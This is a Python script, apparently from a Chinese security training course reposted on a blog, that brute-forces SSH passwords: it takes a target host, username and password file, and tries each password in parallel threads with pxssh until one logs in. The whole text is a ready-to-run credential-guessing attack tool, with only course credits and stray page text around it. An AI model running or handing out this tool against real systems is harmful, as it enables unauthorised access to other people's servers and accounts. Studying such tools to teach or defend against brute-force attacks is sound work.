# -*- coding=utf-8 -*-
#本模块由乾颐堂陈家栋编写,用于乾颐盾Python课程!
#QQ: 594284672
#亁颐堂官网www.qytang.com
#乾颐盾课程包括传统网络安全(防火墙,IPS...)与Python语言和黑客渗透课程!
from pexpect import pxssh
import optparse
import time
from threading import *
maxConnections = 5
connection_lock = BoundedSemaphore(value = maxConnections)
Found = False
Fails = 0
passwdgb = ''
#最外层的release是true的,递归中的release是false,最终的释放是在最外层实现的,也就是在caller中实现的
def connect(host, user, password, release):
global Found
global Fails
try:
s = pxssh.pxssh()
s.login(host, user, password)
print('[+] Password Found: ' + password)
Found = True
passwdgb = password
except Exception:
if 'read_nonblocking' in str(Exception):
print('connect in if')
Fails += 1
time.sleep(5)
connect(host, user, password, False)
elif 'synchronize with original prompt' in str(Exception):
print('connect in elif')
time.sleep(1)
connect(host, user, password, False)
finally:
if release: connection_lock.release()
def main():
parser = optparse.OptionParser('python3 cjdBruceForcingSSH.py -H 目标主机 -u 用户名 -F 密码文件')
parser.add_option('-H', dest = 'targetHost', type = 'string', help = '指定目标主机')
parser.add_option('-F', dest = 'passwdFile', type = 'string', help = '指定密码文件')
parser.add_option('-u', dest = 'user', type = 'string', help = '指定用户名')
(options, args) = parser.parse_args()
host = options.targetHost
passwdFile = options.passwdFile
user = options.user
if host == None or passwdFile == None or user == None:
print(parser.usage)
exit(0)
fn = open(passwdFile,'r')
for line in fn.readlines():
if Found:
print('[*] Exiting: Password Found')
exit(0)
if Fails > 5:
print('[!] Exiting: Too Many Socket Timeouts')
exit(0)
connection_lock.acquire()
password = line.strip('\r').strip('\n')
print('[-] Testing:' + str(password))
t = Thread(target = connect, args = (host, user, password, True))
child = t.start()
if __name__ == '__main__':
main()
# print(Found, Fails)转载于:https://my.oschina.net/chenjiadong/blog/660764
2129
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
